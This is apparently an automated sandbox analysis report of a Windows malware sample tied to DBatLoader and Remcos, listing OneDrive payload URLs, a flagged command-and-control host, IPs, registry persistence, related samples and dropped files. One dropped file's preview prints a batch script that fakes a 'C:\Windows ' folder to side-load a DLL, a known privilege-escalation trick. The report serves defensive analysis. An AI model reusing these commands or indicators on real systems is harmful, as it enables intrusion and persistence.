                                      http://ocsp.sectigo.com0qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://6vq0og.dm.files.1drv.com/Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://onedrive.live.com:443/download?resid=22C765749E54F934%21123&authkey=qDKTsL1y44.exe, 00000000.00000002.1503258792.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://live.com/ZqDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://onedrive.live.com/download?resid=22C765749E54F934%21123&authkey=Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://6vq0og.dm.files.1drv.com:443/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlkqDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://checkip.amazonaws.com/socketveaiqniF.piffalse
                                                  high
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://6vq0og.dm.files.1drv.com/DqDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://6vq0og.dm.files.1drv.com/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5WdLIeFinqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://onedrive.live.com/Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://severdops.ddns.net:2024veaiqniF.pif, 0000000A.00000002.1900086210.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://crl.microveaiqniF.pif, 00000007.00000003.1529994916.000000002F746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.microsoftq#qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://live.com/qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ipinfo.io/countryresourceveaiqniF.pif, 0000000C.00000002.1945846450.0000000000D90000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            https://live.com/)qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://onedrive.live.com/;qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ocsp.sectigo.com0CqDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://live.com/$TuFinqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://6vq0og.dm.files.1drv.com/y4mM3rpwg7BF-uNJeP3DfPwGHRVNoN-DLFLu8jlzryO26WGzJKm854HPXCUj9LrimxRFinqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://6vq0og.dm.files.1drv.com/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk17j5qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.pmail.com0qDKTsL1y44.exe, 00000000.00000002.1575958449.000000001BCCB000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      34.117.186.192
                                                                      ipinfo.ioUnited States
                                                                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                      13.107.137.11
                                                                      dual-spov-0006.spov-msedge.netUnited States
                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                      54.145.184.72
                                                                      checkip.us-east-1.prod.check-ip.aws.a2z.comUnited States
                                                                      14618AMAZON-AESUSfalse
                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                      Analysis ID:1389143
                                                                      Start date and time:2024-02-08 15:20:13 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 10m 7s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:16
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:qDKTsL1y44.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@16/9@4/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 60%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 86
                                                                      • Number of non-executed functions: 194
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                                                      • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target veaiqniF.pif, PID 7604 because there are no executed function
                                                                      • Execution Graph export aborted for target veaiqniF.pif, PID 7952 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: qDKTsL1y44.exe
                                                                      TimeTypeDescription
                                                                      15:21:03API Interceptor2x Sleep call for process: qDKTsL1y44.exe modified
                                                                      15:21:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Finqiaev C:\Users\Public\Finqiaev.url
                                                                      15:21:16API Interceptor24x Sleep call for process: veaiqniF.pif modified
                                                                      15:21:23API Interceptor2x Sleep call for process: Finqiaev.PIF modified
                                                                      15:21:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Finqiaev C:\Users\Public\Finqiaev.url
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      34.117.186.1925qgMqpI3O3.exeGet hashmaliciousXClient StealerBrowse
                                                                      • ipinfo.io/ip
                                                                      5qgMqpI3O3.exeGet hashmaliciousXClient StealerBrowse
                                                                      • ipinfo.io/ip
                                                                      9ndYaphcNr.exeGet hashmaliciousXClient StealerBrowse
                                                                      • ipinfo.io/ip
                                                                      9ndYaphcNr.exeGet hashmaliciousXClient StealerBrowse
                                                                      • ipinfo.io/ip
                                                                      KyRojfL3Fw.exeGet hashmaliciousUnknownBrowse
                                                                      • ipinfo.io/ip
                                                                      KyRojfL3Fw.exeGet hashmaliciousUnknownBrowse
                                                                      • ipinfo.io/ip
                                                                      Jtn7A24RWR.exeGet hashmaliciousUnknownBrowse
                                                                      • ipinfo.io/json
                                                                      Jtn7A24RWR.exeGet hashmaliciousUnknownBrowse
                                                                      • ipinfo.io/json
                                                                      QecR2L8QRt.exeGet hashmaliciousUnknownBrowse
                                                                      • ipinfo.io/json?token=5c76a674354e30
                                                                      QecR2L8QRt.exeGet hashmaliciousUnknownBrowse
                                                                      • ipinfo.io/json?token=5c76a674354e30
                                                                      13.107.137.11rRefN____CMS-221747.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                        WORLDWID.BAT.batGet hashmaliciousDBatLoaderBrowse
                                                                          NEW ITEMS EMARKED.batGet hashmaliciousDBatLoaderBrowse
                                                                            0VRmzMYLNu.exeGet hashmaliciousAgentTeslaBrowse
                                                                              RFQ 11700.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                Purchase Order 0151.exeGet hashmaliciousDBatLoaderBrowse
                                                                                  https://1drv.ms/o/s!Auqmi-d8XdVbhWsQ8BmeM6Ph-do9?e=0gWhejGet hashmaliciousHTMLPhisherBrowse
                                                                                    DocumentsDOC03029314B76858448A444B4C03EEC7E6F.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                      Swift_Advice.bat.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                        PO4540542295GTS-EE-9507-QTN-9507-232.batGet hashmaliciousDBatLoaderBrowse
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          checkip.us-east-1.prod.check-ip.aws.a2z.comjava_adwind.jarGet hashmaliciousUnknownBrowse
                                                                                          • 35.171.138.94
                                                                                          ScubisDesk.jarGet hashmaliciousUnknownBrowse
                                                                                          • 52.44.68.165
                                                                                          ScubisDesk.jarGet hashmaliciousUnknownBrowse
                                                                                          • 52.72.193.95
                                                                                          RuntimeBroker.exeGet hashmaliciousHancitorBrowse
                                                                                          • 52.7.149.164
                                                                                          5WwS5ffYD7.exeGet hashmaliciousUnknownBrowse
                                                                                          • 52.5.109.238
                                                                                          5WwS5ffYD7.exeGet hashmaliciousUnknownBrowse
                                                                                          • 52.7.96.150
                                                                                          SecuriteInfo.com.Win64.MalwareX-gen.4768.13818.exeGet hashmaliciousUnknownBrowse
                                                                                          • 3.88.92.177
                                                                                          SecuriteInfo.com.Win64.MalwareX-gen.4768.13818.exeGet hashmaliciousUnknownBrowse
                                                                                          • 3.88.92.177
                                                                                          PNM7zldlZv.exeGet hashmaliciousUnknownBrowse
                                                                                          • 52.71.112.225
                                                                                          PNM7zldlZv.exeGet hashmaliciousUnknownBrowse
                                                                                          • 35.168.70.54
                                                                                          dual-spov-0006.spov-msedge.netnWiLCvdU0P.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 13.107.139.11
                                                                                          Dwx4h2MQ2s.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 13.107.139.11
                                                                                          rRefN____CMS-221747.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          • 13.107.137.11
                                                                                          SWIFT_MESSAGE.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          • 13.107.139.11
                                                                                          WORLDWID.BAT.batGet hashmaliciousDBatLoaderBrowse
                                                                                          • 13.107.139.11
                                                                                          NEW ITEMS EMARKED.batGet hashmaliciousDBatLoaderBrowse
                                                                                          • 13.107.137.11
                                                                                          0VRmzMYLNu.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 13.107.137.11
                                                                                          Ihfxvzhuopygpt.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 13.107.139.11
                                                                                          Purchase Order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          • 13.107.139.11
                                                                                          RFQ 11700.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          • 13.107.137.11
                                                                                          ipinfo.io56hXAwKryo.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          TBcsV64JvR.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          SNdS4iXscM.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          SNdS4iXscM.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          R3qD3GiVhQ.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          DjjEcDvMht.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          GO6Yx1kOTi.exeGet hashmaliciousRedLine, RisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUSYFtU3BfEsx.exeGet hashmaliciousUnknownBrowse
                                                                                          • 40.71.99.188
                                                                                          nWiLCvdU0P.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 13.107.139.11
                                                                                          http://sansarbuildcon.com/.well-known/pki-validation/Msg9928.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 13.107.213.41
                                                                                          Dwx4h2MQ2s.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 13.107.139.11
                                                                                          Melanie.bodoux_Lettre_virement.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 13.107.246.51
                                                                                          56hXAwKryo.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 131.253.33.239
                                                                                          Windows InstantView 2.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                          • 13.107.219.41
                                                                                          Pending.9980233045Document(s) Export Control docsignMidlandcomputersDrivePnt9980233....msgGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 52.111.229.63
                                                                                          SbqPKQFpkK.exeGet hashmaliciousRedLineBrowse
                                                                                          • 20.79.30.95
                                                                                          http://orkvo0g.ifuhik.comGet hashmaliciousUnknownBrowse
                                                                                          • 20.50.64.3
                                                                                          GOOGLE-AS-APGoogleAsiaPacificPteLtdSGYFtU3BfEsx.exeGet hashmaliciousUnknownBrowse
                                                                                          • 34.117.188.166
                                                                                          56hXAwKryo.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 34.117.188.166
                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          oPUxYDe9mt.exeGet hashmaliciousUnknownBrowse
                                                                                          • 34.117.118.44
                                                                                          file.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          TBcsV64JvR.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 34.117.188.166
                                                                                          SNdS4iXscM.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          SNdS4iXscM.exeGet hashmaliciousRisePro StealerBrowse
                                                                                          • 34.117.186.192
                                                                                          R3qD3GiVhQ.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                          • 34.117.188.166
                                                                                          AMAZON-AESUShttp://sansarbuildcon.com/.well-known/pki-validation/Msg9928.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 52.203.102.209
                                                                                          https://proponent.com/Get hashmaliciousUnknownBrowse
                                                                                          • 54.196.227.84
                                                                                          https://track.trackminds.net/campaign/563210d7-bbd1-40f1-a8a1-5fe191294d15Get hashmaliciousUnknownBrowse
                                                                                          • 34.203.143.4
                                                                                          steve.ledford 020749_Thu Feb,2024.htmlGet hashmaliciousUnknownBrowse
                                                                                          • 52.2.147.173
                                                                                          http://orkvo0g.ifuhik.comGet hashmaliciousUnknownBrowse
                                                                                          • 18.208.62.125
                                                                                          SecuriteInfo.com.Trojan.GenericKD.70652520.4647.24651.exeGet hashmaliciousUnknownBrowse
                                                                                          • 44.217.161.11
                                                                                          1707378906ffbdc063d27195a5577a854b773a0ec1144fd945bf965d6f71c020b51f5c4060211.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                          • 44.203.203.154
                                                                                          Order for new Project ECG EGYPT.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 54.227.187.23
                                                                                          oerder specifications.xlsGet hashmaliciousRemcosBrowse
                                                                                          • 44.203.203.154
                                                                                          https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0Get hashmaliciousUnknownBrowse
                                                                                          • 3.225.30.96
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          a0e9f5d64349fb13191bc781f81f42e1nWiLCvdU0P.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 13.107.137.11
                                                                                          Dwx4h2MQ2s.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 13.107.137.11
                                                                                          US0000379965_759810_4488935722.jsGet hashmaliciousUnknownBrowse
                                                                                          • 13.107.137.11
                                                                                          US0000379965_759810_4488935722.jsGet hashmaliciousUnknownBrowse
                                                                                          • 13.107.137.11
                                                                                          A040571_US14_I_2024668_243478_7830431007.jsGet hashmaliciousUnknownBrowse
                                                                                          • 13.107.137.11
                                                                                          A040571_US14_I_2024668_243478_7830431007.jsGet hashmaliciousUnknownBrowse
                                                                                          • 13.107.137.11
                                                                                          US0000348020_533626_6997231288.jsGet hashmaliciousUnknownBrowse
                                                                                          • 13.107.137.11
                                                                                          US0000348020_533626_6997231288.jsGet hashmaliciousUnknownBrowse
                                                                                          • 13.107.137.11
                                                                                          n634pS0ANZ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, SmokeLoader, VidarBrowse
                                                                                          • 13.107.137.11
                                                                                          Windows InstantView 2.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                          • 13.107.137.11
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\Public\Libraries\netutils.dllnWiLCvdU0P.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                            Dwx4h2MQ2s.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                              WFRlr0p5IH.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeGet hashmaliciousAgentTesla, DBatLoader, RedLineBrowse
                                                                                                  Bjrfyyjj.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                    PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse
                                                                                                      SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                        SCAN_DSC0027929829.PDF..exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                          DF0987890000.scr.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                            C:\Users\Public\Libraries\easinvoker.exenWiLCvdU0P.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                              Dwx4h2MQ2s.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                SOA_P990T341_JAN_2024.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                  rRefN____CMS-221747.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                    SWIFT_MESSAGE.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                      Ihfxvzhuopygpt.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                        Purchase Order.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                          RFQ 11700.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                            DocumentsDOC03029314B76858448A444B4C03EEC7E6F.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                              Swift_Advice.bat.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Finqiaev.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):100
                                                                                                                                Entropy (8bit):5.0302737254118135
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMULVbZsb8W+KZn:HRYFVmTWDyzVVEHbZn
                                                                                                                                MD5:271883628F24D3E3254CAC48D553D003
                                                                                                                                SHA1:B51C603D4566029D98D09E7371C31561F192D4F3
                                                                                                                                SHA-256:8F6ED543C4F138848CA4D1829D14650F138C0AB674B66AA1D32FFC2F39F907CE
                                                                                                                                SHA-512:14EE6C319E53076B3795FF1C8944D7685D41A95B75177DC4D65C0749056F372FA958531C4776453CF5C641909C6FB5A70C720021138C7EC45743F47200402082
                                                                                                                                Malicious:true
                                                                                                                                Reputation:low
                                                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Finqiaev.PIF"..IconIndex=43..HotKey=92..
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2088448
                                                                                                                                Entropy (8bit):7.567222542176421
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:Tv5bdj3QfVJ9zq23znSFZyeyTDLudOybI:Tv5Rj30VjSnye4eOH
                                                                                                                                MD5:42F93EF4AC4943F328A1518BDE3C333A
                                                                                                                                SHA1:7BCA2B97FE0136A6787A1F08903E723A7B2A17C1
                                                                                                                                SHA-256:60E73C48B9559B07BA1AEE9FE48E0185A2686E5B88407C590F60535FF36F85DB
                                                                                                                                SHA-512:F3EBB6F511D27724B69D6495BF07C7AD39BDDF4C4EB3611B986FAF89920E84F5E4CCF709EC4D9797A2D4976F3694163AFAEAE61A24174CDE54D8F33FC44487FB
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                Reputation:low
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................0......H.............@........................... ..................@..............................L*...`..........................@q...................................................................................text.............................. ..`.itext.............................. ..`.data....}.......~..................@....bss....p:...P.......,...................idata..L*.......,...,..............@....tls....4............X...................rdata...............X..............@..@.reloc..@q.......r...Z..............@..B.rsrc........`......................@..@.............. .....................@..@................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):404
                                                                                                                                Entropy (8bit):5.010767804598093
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:rT4etMs2cLv0Y/T2cLZ9ULT2cLZthGKFIs2cLZXIs2cLZWKmxkv:f4etMXK0Yi5L60GeWbRKZv
                                                                                                                                MD5:6880148D6CD8FABDCE94B7E91DBD8D17
                                                                                                                                SHA1:870E9AD13355A8452746E0904D004EE8C8EC66E5
                                                                                                                                SHA-256:0BFE311FFB1DE96CBB2616C2A59C2A1A4942EC03073CC2DDFDFC43F79C74D18A
                                                                                                                                SHA-512:810EE2896597CBCF813B9285BB2D7F9127360A4D8A872C47460D32710FE114C27ED58F840DC8BCFDAF7B826E7E46C78C0E814E4FA3D380D10737673A1FEBF38E
                                                                                                                                Malicious:false
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview:start /min cmd /c mkdir "\\?\C:\Windows " &..mkdir "\\?\C:\Windows \System32" &..ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y &..ECHO F|xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y &.."C:\\Windows \\System32\\easinvoker.exe" &..EXIT ......
                                                                                                                                Process:C:\Users\user\Desktop\qDKTsL1y44.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):271
